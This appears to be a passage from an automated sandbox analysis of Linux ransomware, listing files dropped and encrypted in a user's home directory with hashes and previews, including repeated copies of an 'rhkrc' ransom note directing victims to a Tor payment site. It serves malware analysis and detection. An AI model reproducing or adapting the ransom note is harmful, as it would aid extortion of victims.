                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/gvfs-metadata/root
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):296
                  Entropy (8bit):5.648757476429721
                  Encrypted:false
                  SSDEEP:6:lNH6o1zVkbmU1zmhOO/EUyp6Xc0o7Vy36ZNa8fLL:lE+VkCI2DcUBmaATL
                  MD5:34795584DF65E575394AD2CD22914FBC
                  SHA1:CCB4808F4485A3547B24CDDB4E86A978974FAA6C
                  SHA-256:E7C87B7EC8F95CD7AFABA8F14D2FADD98C2A26ED2A12576113C03998EC5306E0
                  SHA-512:BBCBDAE9B595DC1D1D6B50023CF78B86F791239D17A2F7CD51AB0E7FB929E8D22176246CC79CE09918A0EDCADF91CA3263F8266AB107F117BCCFB2BE2F6B06B9
                  Malicious:false
                  Reputation:low
                  Preview: ...J..{.B..`q...L.}.!y....:..$.R..Zn2'.....p..~Q......"C..B..'".%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................l.........q...F6J.2.G..B..?.k...9........OS|.........>..
                  /home/user/.local/share/gvfs-metadata/root-d269eba3.log
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):33000
                  Entropy (8bit):7.993854842219714
                  Encrypted:true
                  SSDEEP:768:BugITjSXQnkQtZ/+gmU7/XUVXLPw6JZEE2B3Q7yoshLqgu0di+:BbInSAnt//+g7X8XLPLjK3QmNID0
                  MD5:BCDBBEC990D2CA8B7F285BED88B2D7D6
                  SHA1:CB8F58EC1D2EF526F30A806D5E29D015A853A057
                  SHA-256:1CFFDA2A43D81D2598DCD735533BB7144B159976DEC5CBD378F049B38899238D
                  SHA-512:7C34AC5B392E92384DE2CE0D6AD57CA03E9ED67C79C69B1F3DAE2251E21B787BBE6971DED62F99645786AF03F65DD378DE3D58B10BECEBEC4918680778343F43
                  Malicious:false
                  Reputation:low
                  Preview: 8.C.........`........*J..1.L...>(.8...^...dn....3...3/qF:......y[.W1...p]Dk.B7M....r.>..Y..!.+....~.y>..$.D.^.|......k....BgT.G...&.ss...K...,..TNI3.....N.../.C..n.+jx....T.6"&.......P@...U....$...%.lk.._.........k."../18....J...L.......^l6......$Bw...........q~...........A)5.6.>....!$j3ml|..o..Z..k..U...;C.{..E...hv.R>.D......!.Cc...I.*EK..2.v.@..B9.4ka.S..U.te..d%+...A..\..s....62.=e..Jt.V^s....h4..B....h.DN\.g......$......m..W.8.V...gO:..."..3.L......(...{..g..3O.m.@.;{..2.l.5....i!..(.fa'K..Q..).BL....un....../z....XTc.....!...Tr#$....nl.1Iw.W...cO......w.7..>..j$...r..#B6.q<.= ..E+.x...}..Q..h.S531s)X..^.qg...%.s(XR.uK..c....V...V..+(..v...<..P..?.....$.z....a/.....[.9E..&.GZ ..".l."`.T,MK+S..n&`1.....F5......9...IG....S.N...q..ij.......}A..Eyp."M..0..s..bg.X9..g^.Y...!.P..V>....e...pT[......7Tp.J...T.A.....x.......G..C...t.... ...3.d..#....l..;S...L..a9..Z(.V.?.......=....u#......G.xw*n.;...p........:....3k..V. q>...s./.raF9.v1...P..u......|.8f....d.M...f...E.RK.&......q....o...y
                  /home/user/.local/share/keyrings/login.keyring
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):337
                  Entropy (8bit):5.931814651498272
                  Encrypted:false
                  SSDEEP:6:7x90RrPlWI11zmhOO/EUyp6XcsMc3dj3Hd:7xGRBWIL2DcUBBLB39
                  MD5:A65AED540C317E20F7B10179E70A5094
                  SHA1:6B2EF9EEA4D0A753039BBFC648AB6C77920641BC
                  SHA-256:28C7EFDD6FE977069CDF92804D77A0F555DE316BAD03BFF7A17885AA58EF06C1
                  SHA-512:7655FD8573937923319D6379F987176B5FF1921E93C9AFE5B41E9126361FCAD8C5D855B0225B240F8226F67DB3A620EA46CE9D634516013FC9CA3B5833FE52DF
                  Malicious:false
                  Reputation:low
                  Preview: G.e.(:.!g{;\..z3.....0.%.....w~...i.._s.%.,e......n4Q!^E.e...O}..]..w......x..V...@....%..[y.9Y.r...Bm;..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................@.9.i...aE.....)B...Z...BpK6...}......59K.............:.
                  /home/user/.local/share/keyrings/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/keyrings/user.keystore
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):439
                  Entropy (8bit):6.414017754937663
                  Encrypted:false
                  SSDEEP:6:qpjP6Pfeq71beexsrih9gX7NTbCaEL5oA11zmhOO/EUyp6XcZoClJm7+KRY:bFbzuNT2as5/L2DcUBr+m7n+
                  MD5:FAC86521F05F4A4EFE7E89AC5611015E
                  SHA1:5311B7E1DD20DBD3F887C59A117A94445F512342
                  SHA-256:E958897463E715D74A80592CAB15835DEDB61BC34FC192D3390D7ECF6578189A
                  SHA-512:2325FDAAFB529304EE6F445F0D01DE19BE195942E346AA9DA12EC529264235D53674EDE11C41EEF3C9E669B3E96A422D17B868F07F35B4BC8A2C05C06AE78CFC
                  Malicious:false
                  Reputation:low
                  Preview: j\C...|.'y.YtS~..<..W.L..I.b.G.\\R..x..".O...}.y..jz...!..cA....^h...t.x..d..m.p.._;>.K$.).|*..~]..!.n>...z7.MPc.@...w....3..............}.:C...]..e_..b.9.j....c.....^.|h.....Q4!C9.._..c......u.....`..(.Mb..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................b...WH....#..m .....m..1i.{.n?C...........-..........t.
                  /home/user/.local/share/recently-used.xbel
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1013
                  Entropy (8bit):7.482390065117171
                  Encrypted:false
                  SSDEEP:24:U2mW5XbEhzMtiIvHbUSnc3Fxyf6+zVfCh72lO572Df7Rs:EvYbUrF8dfC/KDVs
                  MD5:61F62D15E0AFD9E9209A2B0A35DAD564
                  SHA1:A1DF23026ADE4A59B9A7F475A757633AFB91B5A5
                  SHA-256:3EF743B1AF62BA707C6B424F75A32525BCF0E4F6AEA8D00675318C455000D082
                  SHA-512:E168DEF15A1787546B47BAC28DA79360262C8EE90243331AC42E3671F1F6B79DE6AB8C2D4BA8D2D935DB384834BFBB0A2916A90D9BF172506C3B6BB0BD4790E9
                  Malicious:false
                  Reputation:low
                  Preview: F...<.T...........I.tRxX...x..` ...S...`M....z...7d....4.5..;...A.J..=|1.8.N...Z+wuT9.....%o.....z.M..Q....*.wHh.c.R.3..$0.....E.....`1......H#..........yM..8UW.......a......W3n.........>g/....`..a?..l^C.rI...........IyP:.`.|...8....!...{Q.Q...T.t..>!..Z...l.C.WFZ.?.S.T.I9.....'..d..Pf\..,......L?#..s<R.a.....=...}......./.5..../.{x...h..~.s..tU.=.i.-}..K.<80.t.y...0S.=X.L-...*.Q.P.}..i...t...x.F.........jm.....T..P}..X...7yH.Z.M-xM.H....n.H.rOwW.u.$c..Rk.A....E.....HL..=.vfv....^.../...M._ ..}...q!.]...[....^..g.....O........l.^;...^....q.1......h%.V.9.......OM...._.....w}.W...[i....6v.w.=...{...4TD<......6.f>.......a..L.......'I.7.$....hOW|P..tx.~..4D..c.7..T."I..=.p........a..%.....ld.`=...9?...p...o.......N........x..E......tV..g.S....-.n.Z..q..o.^..5.*......K\......%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................[o......].M7.Q.....7..]....\V........LI.
                  /home/user/.local/share/recently-used.xbel.XEOG50
                  Process:/usr/bin/mousepad
                  File Type:XML document text
                  Category:dropped
                  Size (bytes):853
                  Entropy (8bit):5.010341802168014
                  Encrypted:false
                  SSDEEP:12:TMHdE2J9kLS3ROBQkLSjE7wnBtue2dyaz/JtnLRVHuEwUQKwU7wUnIR+wUQCweKQ:2dEm3RJVjrBo8iJtVVd6sh9z4Y/IEdZb
                  MD5:E041DC9F4336897285AE5763C4B5E667
                  SHA1:019A1FA4FBEE73E165C1A17D18653543CAC1ED93
                  SHA-256:79C816CF2F517FDDBCD9E7DC384DA9C5AFAD083AFDCEAAC68E07D0BA3C7EAD50
                  SHA-512:1BC1D533C7133CD07BB85EEE0697CBEF9F38773C8272AC58A53D63471AC578733EDDC2842426222280EEB8956554A3BC24A036E2ECDC7AD6F7C4E9806A49AD92
                  Malicious:false
                  Reputation:low
                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<xbel version="1.0". xmlns:bookmark="http://www.freedesktop.org/standards/desktop-bookmarks". xmlns:mime="http://www.freedesktop.org/standards/shared-mime-info".>. <bookmark href="file:///home/user/Desktop/rhkrc-readme.txt" added="2021-07-01T20:58:20Z" modified="2021-07-01T20:58:20Z" visited="2021-07-01T20:58:20.890960Z">. <desc>Charset: UTF-8</desc>. <info>. <metadata owner="http://freedesktop.org">. <mime:mime-type type="text/plain"/>. <bookmark:groups>. <bookmark:group>Mousepad</bookmark:group>. </bookmark:groups>. <bookmark:applications>. <bookmark:application name="Mousepad" exec="&apos;mousepad %u&apos;" modified="2021-07-01T20:58:20Z" count="1"/>. </bookmark:applications>. </metadata>. </info>. </bookmark>.</xbel>
                  /home/user/.local/share/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.local/share/session_migration-xubuntu
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):289
                  Entropy (8bit):5.585892306343375
                  Encrypted:false
                  SSDEEP:6:KALTp6SLxX1zmhOO/EUyp6Xcw8FkKgJtM6:K6jLP2DcUB8gF
                  MD5:A617CFCAD58F0F52C21C60339DC3C00C
                  SHA1:1BD2BF312E3581FA0998559E24BF18F1AE029CD2
                  SHA-256:1B8252165187E17E51FACB2A74E3A7AC5C269473A7A5F96EC3B6B630F4650FC4
                  SHA-512:52BF0274BB256F7050826A761E82FE25BCA8E7E58304DD957EF6E40B1EBFB6549354D106FCB8F267D0226975826CDE873E8F49C3E10A0045B2B109142E78BB4A
                  Malicious:false
                  Reputation:low
                  Preview: ...;......x......0.9...~.......-X.....PrC...f.L3.........%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................?.x.@.5v...G.o=....Y.M&......&.x(.K.O. ..L..........."
                  /home/user/.mozilla/extensions/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/Crash Reports/InstallTime20180313132747
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):242
                  Entropy (8bit):5.077267472507828
                  Encrypted:false
                  SSDEEP:3:osVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1Cqh8gfTw97T/6Jn:o01zmhOO/EUyp6XcMTgfs7+J
                  MD5:6FA9571F9FC5ABCB330ECB2A3A2C89F9
                  SHA1:D8C7C4EEEE3CAE7320A43495B7A5EA6F51BA1D9E
                  SHA-256:04E6AD1A4D971066C1CAB5436CCC61477E1C51D1F0CED8A9BC15CD0CEFAA951E
                  SHA-512:C59CE813FCA2666396C639E6F9951087AB0F9020D4BA142C1EAC9F7E9545FA31A01D54569B41A5E72F79A7B4A53B3E97F0A20C0CE5EB07D445172029EF3BB047
                  Malicious:false
                  Reputation:low
                  Preview: ......Ql..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp............................................................................................J.].j....9j.g.{....cs.-...~........b/z..........T...
                  /home/user/.mozilla/firefox/Crash Reports/events/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/Crash Reports/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/Pending Pings/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/profiles.ini
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):336
                  Entropy (8bit):5.954860478696571
                  Encrypted:false
                  SSDEEP:6:TgXe6/oGlf1zmhOO/EUyp6XcicWPyHAvZrVc:We6hd2DcUBLFPyHAvZhc
                  MD5:B28C892E12605066BEB72DFE46C7022B
                  SHA1:D9811752B9195153A38A8A0F631239754F4996BF
                  SHA-256:71040BF848D968E0185A394226B60F8B410DE936125C14EF724BF1D877BFEFF2
                  SHA-512:EE09D6830F200B1788AA1848F04904034DFF3A3AF79B8F5CAD9F3A470F715CEBFE02278D03866B4AA0A1390131EFC8DE35B15650240F74EE56679AAD589A7EFD
                  Malicious:false
                  Reputation:low
                  Preview: ..&.....GZ..`.......^V.........]........n...$+pb....s.%....m.7t2...c...GF^a1....M..:...../=..o.*...g....%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................m.9?Y..? ...z.....WF#..j......:wm.qZ.UZ..(............X.
                  /home/user/.mozilla/firefox/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.mozilla/firefox/u5o5kk16.default/SiteSecurityServiceState.txt
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1322
                  Entropy (8bit):7.627911125428583
                  Encrypted:false
                  SSDEEP:24:0Bo1bKOpXXZl7khxawqppkdyC0C73JqiKRgXeWaA7fC5Bs/2Df8ZBM:CkV9ZJkrawqKyCD7U+da4fEDkTM
                  MD5:0D42A6D06CE7908621DE9EA433A762E8
                  SHA1:D1D6438E0BD01D670B8B06C795D335BB250633B7
                  SHA-256:E7DA1181951DC912973207DA1BAA44752875423DBC48B854BC20D78A45181DF4
                  SHA-512:8B170CDF07217385971AC14819710F998423E81182AFCD7AD5D30FBF22ACF1241D7972A4F68308423AF3321EA4033D17F1A96C8C8C2DE167627D9CBFEFD3B5E5
                  Malicious:false
                  Reputation:low
                  Preview: ....H..q...&..R.=O.....D.)..O..+...Ab.<.##.~j.....B.Vh..9M.4o33...H>;M......-.v+.W&..{.a..5........u...H7y|..{..l9...........u.A..pl@..@/..#.".in..u3P..-.-9j.v.ml..%7.....gn!..z^...w.'.q86.t...N.[...e.....N....Z.%..W0.,....}.....F.#.Y....-..#B..!I..n...,..8....["..y.F/..V!2.2.=0o.m!.}.`..;.gx.!.U36'...o.-8I.s]v.@cS....^.G..6.0...[...F.v.S&......5.. .L........q..L.;....E.(7j!OfU.........0..Y..5-B..uS..S.#.q...MvH..w\..@.OR..3D..n......F........-.Dd.{.....LX.~VcTW..p....A.X....1a.......r.O=l._..xBz....@....?N...E..-z....&N..%D.v..|.S......&.#e8.}Pg.g......J.. .8..+K7.Pl._.....u..Ze......p<..]...E..b$.f..4.X.-z=.....U.QJ...2....hsA.O.C...}....@F...}l..YRG..1B.5....t..#..9T....\.....(V.]eK\....@t.3rq..u.@..A&.C7...R...]<.^.=B..{....x.....H.....8..>......^3..{I..QT.5Y...|*.<..1...i...y.D "C.+..OD...<.....M.s....j.Lf.=F.Y.Kg.u.1D..t>m...`......T...Q.@.....L.;...n.h.h..6..u..04X.f .5(.r........&9..Z.....8$...i.v'.u.Bq...g..}QQ.)X..D..5v#.....0...5....XI/...^...!..,.|..G.....z...L..~.W..V.....
                  /home/user/.mozilla/firefox/u5o5kk16.default/addonStartup.json.lz4
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):910
                  Entropy (8bit):7.38162021541402
                  Encrypted:false
                  SSDEEP:24:67PHTykyn65nvQj9CrrZKzInx4af2DfKJyi:67PHnt5v09CEze2a+DSJyi
                  MD5:694E1090BDC1E76C4E93FD836A806D2F
                  SHA1:3DC3667EED0A0AD465C160AA475C211B50E51A59
                  SHA-256:DEF64F6C6F10F6A6D2228E8FA3E9E37DD360299404489D853BEB3E391FA802A5
                  SHA-512:ABFFA70232E7787231456A3E6E03B7909669D57C35ABE7915295CB905A6BF6EDA914D63AB89B62BA088DDD60F1C7982F40E41BBBDE365ECD66657C1E602BDE4D
                  Malicious:false
                  Reputation:low
                  Preview: .....qm.....w.Vy^.r'yO.>_,.e.,.G......`'..2.DI....qYHJ. !k.2....X'.Y.p...@.5.,.[o6r...k.`..[{..D..'>.....&.r...#.[...K$...7.......E........(s........h..M.R..l.8Fo....da.s..E>.....<..7......yEpX..r......&.E.`.S(...)I.ZGw...ur:.....?..C{...I.v6.I....9D.}r................m.c...9..l.u...V'.nt.HL..K.}.....&...U.ty0.e..,..p...).e..rw..i..2aV...[.w*.Pa......i3........2.Z-....l..9,.....`..*'8..........3d.Q.;.;.\..{.....t.R...5..\.....I%c...1...O.8/...x.c.[........sV..((j..M.1.f.\...:.p....T.vO..3.....#..hE.<.E>...{.~BBE@V....a.R.`m......?...@.<.....H.;./...t*"r./..w.:.>0..} ..m.: G..F..t....X.y.#.O...L80.M...q.Rn?6...Tg.v......`.R2..L.BH.U\.~.Q*......w`...Z.6Pj..a .p...D.]u..."%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................9Ky.K..s.'x...l........Px.cT.m+.?e+`.1.NdD.C..........j.
                  /home/user/.mozilla/firefox/u5o5kk16.default/addons.json
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):256
                  Entropy (8bit):5.188804003618914
                  Encrypted:false
                  SSDEEP:3:tEWQOtnVJvfb7PmWE9CiYa1ESghgEUMzpET77cP1JlNUbGpc/FJtz2ro7SeL8Xdn:q9c1zmhOO/EUyp6XcFGbG2jzgU8Xd
                  MD5:2C881F7C118C69212C597D0BC81789B8
                  SHA1:12343823972D6F86B5317AFC5F190AD580BD3A0F
                  SHA-256:817A05A19503FCD55C8E39299D1465ACB6E2E8991766C33098A9ED4FE6CCF318
                  SHA-512:17EFC6522E234607980EB24540D714B0AC340D09A97B4FB277A15958E535A6F79105E021B3A3434E74AC455F0AF6776E151C57ECB59FE339776AAF6AB08CAA14
                  Malicious:false
                  Reputation:low
                  Preview: k'..4.E..0. ..E.c..<.`8.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp...........................................................................................d.c'qY.1.... ..y..A.0.E.m...H...[.4.l;.AP........vp..
                  /home/user/.mozilla/firefox/u5o5kk16.default/blocklist.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):293455
                  Entropy (8bit):7.999139980688762
                  Encrypted:true
                  SSDEEP:6144:LVyr841n7BGn+EwA/3M33ZVmQBuhCWXU7DCFrXZBiY02lkk:L0rL7BGnJxQBibUwXiYplkk
                  MD5:04D5D05E47C604EA2CCC4383138DA8B2
                  SHA1:5F31326E347BC657F9CAB583E0576CC490AFCA57
                  SHA-256:5779E404F29FCC233E9D88F6355AF1DDA38FB5DD51A3117A2E40271AE4C7639D
                  SHA-512:B679E3F31A9590262A5C090FCD37E8002E5984320C63804E2EB5549A578FDFFFB7F8BBA08E1EB72323AAFD919A4CF6FDEA44E35598009983BD131049F684BF6E
